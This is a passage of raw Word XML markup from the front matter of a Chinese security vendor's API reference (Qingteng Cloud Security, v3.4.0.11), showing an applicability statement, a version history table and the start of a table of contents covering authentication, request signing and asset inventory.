                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular" w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>■ 适用性声明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009807A8" w:rsidRPr="000449B2" w14:paraId="0FCAA898" w14:textId="77777777" w:rsidTr="009807A8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10065" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F0C23E9" w14:textId="77777777" w:rsidR="009807A8" w:rsidRPr="000449B2" w:rsidRDefault="009807A8" w:rsidP="00AE5EA2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000449B2">
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular" w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>本文档为北京升鑫网络有限公司（以下简称“青藤云安全”）的产品功能介绍，适用于用户使用及参考。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="18B1BD41" w14:textId="77777777" w:rsidR="007955E6" w:rsidRPr="000449B2" w:rsidRDefault="007955E6" w:rsidP="00A01BE9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DB6F0C2" w14:textId="77777777" w:rsidR="007955E6" w:rsidRPr="000449B2" w:rsidRDefault="007955E6" w:rsidP="00A01BE9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="11"/>
        <w:tblW w:w="10065" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2694"/>
        <w:gridCol w:w="2126"/>
        <w:gridCol w:w="5245"/>
      </w:tblGrid>
      <w:tr w:rsidR="008F4FD6" w:rsidRPr="000449B2" w14:paraId="7DC8508B" w14:textId="77777777" w:rsidTr="009A7E12">
        <w:trPr>
          <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2694" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F264C25" w14:textId="77777777" w:rsidR="008F4FD6" w:rsidRPr="000449B2" w:rsidRDefault="008F4FD6" w:rsidP="00A01BE9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
                <w:b w:val="0"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000449B2">
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular" w:hint="eastAsia"/>
                <w:bCs/>
              </w:rPr>
              <w:t>时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B440EC5" w14:textId="77777777" w:rsidR="008F4FD6" w:rsidRPr="000449B2" w:rsidRDefault="008F4FD6" w:rsidP="00A01BE9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
                <w:b w:val="0"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000449B2">
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular" w:hint="eastAsia"/>
                <w:bCs/>
              </w:rPr>
              <w:t>版本</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5245" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6CF7619F" w14:textId="77777777" w:rsidR="008F4FD6" w:rsidRPr="000449B2" w:rsidRDefault="008F4FD6" w:rsidP="00A01BE9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
                <w:b w:val="0"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000449B2">
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular" w:hint="eastAsia"/>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008F4FD6" w:rsidRPr="000449B2" w14:paraId="32B2B975" w14:textId="77777777" w:rsidTr="009A7E12">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2694" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="08C6D0D9" w14:textId="02721211" w:rsidR="008F4FD6" w:rsidRPr="000449B2" w:rsidRDefault="00714343" w:rsidP="00A01BE9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000449B2">
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="000449B2">
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> DOCPROPERTY  日期  \* MERGEFORMAT </w:instrText>
            </w:r>
            <w:r w:rsidRPr="000449B2">
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2022.09</w:t>
            </w:r>
            <w:r w:rsidRPr="000449B2">
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E46BB1F" w14:textId="444598F2" w:rsidR="008F4FD6" w:rsidRPr="000449B2" w:rsidRDefault="00F61A3B" w:rsidP="00F61A3B">
            <w:r w:rsidRPr="000449B2">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="000449B2">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> DOCPROPERTY  版本号  \* MERGEFORMAT </w:instrText>
            </w:r>
            <w:r w:rsidRPr="000449B2">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>v3.4.0.11</w:t>
            </w:r>
            <w:r w:rsidRPr="000449B2">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5245" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0A856723" w14:textId="159C08C0" w:rsidR="008F4FD6" w:rsidRPr="000449B2" w:rsidRDefault="008F4FD6" w:rsidP="00A01BE9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000449B2">
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>第一次发布</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008F4FD6" w:rsidRPr="000449B2" w14:paraId="324F374D" w14:textId="77777777" w:rsidTr="009A7E12">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2694" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="34257794" w14:textId="6C0B8C0B" w:rsidR="008F4FD6" w:rsidRPr="000449B2" w:rsidRDefault="008F4FD6" w:rsidP="00A01BE9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000449B2">
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C693F29" w14:textId="1D8B2EC6" w:rsidR="008F4FD6" w:rsidRPr="000449B2" w:rsidRDefault="008F4FD6" w:rsidP="00A01BE9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000449B2">
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5245" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0CA8CBEF" w14:textId="1E830038" w:rsidR="008F4FD6" w:rsidRPr="000449B2" w:rsidRDefault="008F4FD6" w:rsidP="00A01BE9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000449B2">
              <w:rPr>
                <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2007429A" w14:textId="77777777" w:rsidR="002917F3" w:rsidRPr="000449B2" w:rsidRDefault="002917F3" w:rsidP="00A01BE9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="201D6DFE" w14:textId="172BCC37" w:rsidR="00182C62" w:rsidRPr="000449B2" w:rsidRDefault="00182C62" w:rsidP="00A01BE9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="186392EA" w14:textId="77777777" w:rsidR="007955E6" w:rsidRPr="000449B2" w:rsidRDefault="007955E6" w:rsidP="007955E6">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:rPr>
          <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
        </w:rPr>
        <w:sectPr w:rsidR="007955E6" w:rsidRPr="000449B2" w:rsidSect="009807A8">
          <w:headerReference w:type="default" r:id="rId16"/>
          <w:footerReference w:type="default" r:id="rId17"/>
          <w:pgSz w:w="11900" w:h="16840"/>
          <w:pgMar w:top="907" w:right="907" w:bottom="907" w:left="907" w:header="851" w:footer="283" w:gutter="0"/>
          <w:pgNumType w:fmt="upperRoman" w:start="1"/>
          <w:cols w:space="425"/>
          <w:docGrid w:type="lines" w:linePitch="423"/>
        </w:sectPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc514840294"/>
      <w:bookmarkStart w:id="1" w:name="_Toc492632473"/>
    </w:p>
    <w:bookmarkEnd w:id="1" w:displacedByCustomXml="next"/>
    <w:bookmarkEnd w:id="0" w:displacedByCustomXml="next"/>
    <w:bookmarkStart w:id="2" w:name="_Toc89699022" w:displacedByCustomXml="next"/>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:ascii="阿里巴巴普惠体 2.0 55 Regular" w:hAnsi="阿里巴巴普惠体 2.0 55 Regular" w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
        <w:id w:val="1206915914"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="11D57464" w14:textId="6A74F56E" w:rsidR="00100306" w:rsidRPr="000449B2" w:rsidRDefault="00100306" w:rsidP="00C20931">
          <w:pPr>
            <w:pStyle w:val="TOC"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:ascii="阿里巴巴普惠体 2.0 55 Regular" w:hAnsi="阿里巴巴普惠体 2.0 55 Regular" w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
              <w:b/>
              <w:color w:val="00A4C5"/>
              <w:kern w:val="2"/>
              <w:sz w:val="36"/>
              <w:szCs w:val="36"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="000449B2">
            <w:rPr>
              <w:rFonts w:ascii="阿里巴巴普惠体 2.0 55 Regular" w:hAnsi="阿里巴巴普惠体 2.0 55 Regular" w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
              <w:b/>
              <w:color w:val="00A4C5"/>
              <w:kern w:val="2"/>
              <w:sz w:val="36"/>
              <w:szCs w:val="36"/>
            </w:rPr>
            <w:t>目录</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="6C7FD023" w14:textId="717B87DB" w:rsidR="007E0888" w:rsidRDefault="00BE0A15">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:bCs w:val="0"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="21"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="000449B2">
            <w:rPr>
              <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
              <w:bCs w:val="0"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="000449B2">
            <w:rPr>
              <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
              <w:bCs w:val="0"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r w:rsidRPr="000449B2">
            <w:rPr>
              <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
              <w:bCs w:val="0"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc115166077" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1 概述</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166077 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7E60BA9C" w14:textId="2158212D" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:bCs w:val="0"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="21"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166078" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2 请求方法</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166078 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5FE3E217" w14:textId="4FFFF3FE" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166079" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.1 基本请求方法</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166079 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="44656A17" w14:textId="497A9DB4" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166080" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2 身份认证</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166080 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="01A3D71D" w14:textId="47A8F0ED" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166081" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.3 请求签名</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166081 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="05803673" w14:textId="4A9B2D64" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166082" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.4 通用Get请求参数类型及说明</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166082 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="22B59520" w14:textId="5F99357D" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166083" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.5 数据api请求结果</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166083 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2B26A634" w14:textId="2B5C8487" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:bCs w:val="0"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="21"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166084" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3 资产清点</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
